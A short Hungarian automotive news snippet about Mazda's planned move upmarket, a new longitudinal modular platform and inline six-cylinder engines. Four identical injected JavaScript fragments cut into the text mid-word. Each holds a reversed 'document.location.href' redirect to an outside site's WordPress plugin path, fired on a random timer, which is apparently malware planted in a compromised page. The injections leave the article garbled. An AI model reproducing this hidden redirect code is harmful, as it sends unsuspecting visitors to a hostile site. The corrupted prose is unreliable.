Teljes szemléletváltás kezdődik a Mazdánál és ez nem azt jelenti, hogy a Kodo dizájntól fogunk elbúcsúzni. A márka kicsit elmozdul a prémiumszegmens felé és a nagyobb modellek műszaki tartalmát teljesen megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztatja. Elkészült az új moduláris padlólemez, ami már hosszában fogja fogadni az új motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torokat. Ebből is készül egy teljesen új család, méghozzá soros hathengeres darabokkal, részleteket erről még nem árult el a gyártó. Az azonban most kiderült, melyik lehet az első modell, amit már az új műszaki tartalommal ismerhetünk meg. “A Mazda toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbra is kiemelt figyelmet fordít a magas hatékonyságú motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torok fejlesztésére, mint a Skyactiv-X, valamint az új soros…
- Hirdetés -